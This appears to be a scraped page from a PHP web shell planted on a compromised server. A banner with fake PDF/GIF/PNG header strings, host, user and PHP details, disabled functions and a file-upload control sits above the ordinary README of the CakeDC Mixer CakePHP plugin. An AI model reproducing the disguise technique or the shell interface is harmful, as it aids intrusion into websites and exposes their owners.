%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/vendor/cakedc/mixer/ |
Upload File : |
[](https://packagist.org/packages/CakeDC/mixerd)
[](https://packagist.org/packages/CakeDC/mixerd)
[](https://packagist.org/packages/CakeDC/mixer)
A plugin to discover and manage CakePHP plugins and generate skeleton application code.
Requirements
------------
* PHP 5.6+
* CakePHP 3.4+
Installation
-------
You can install this plugin into your CakePHP application using [composer](http://getcomposer.org/doc/00-intro.md).
The recommended way to install composer packages is:
```
composer require --dev cakedc/mixer
```
Ensure Mixer Plugin is loaded in your config/bootstrap.php file
```php
if (Configure::read('debug')) {
Plugin::load('CakeDC/Mixer', ['bootstrap' => true, 'routes' => true]);
}
```
Now you can navigate to your app `/mixer` URL and start discovery and managing your plugins! It searches through all packages on Packagist with type "cakephp-plugin" excluding CakePHP 2.x packages.
**Attention:** we don't want you to use Mixer in production. That's why we're asking to add it to `require-dev` composer.json section and it will only work when `debug` is on.
Support
-------
For bugs and feature requests, please use the [issues](https://github.com/CakeDC/mixer/issues) section of this repository.
Commercial support is also available, [contact us](https://www.cakedc.com/contact) for more information.
Contributing
------------
This repository follows the [CakeDC Plugin Standard](https://www.cakedc.com/plugin-standard). If you'd like to contribute new features, enhancements or bug fixes to the plugin, please read our [Contribution Guidelines](https://www.cakedc.com/contribution-guidelines) for detailed instructions.
License
-------
Copyright 2017 Cake Development Corporation (CakeDC). All rights reserved.
Licensed under the [MIT](http://www.opensource.org/licenses/mit-license.php) License. Redistributions of the source code included in this repository must retain the copyright notice found in each file.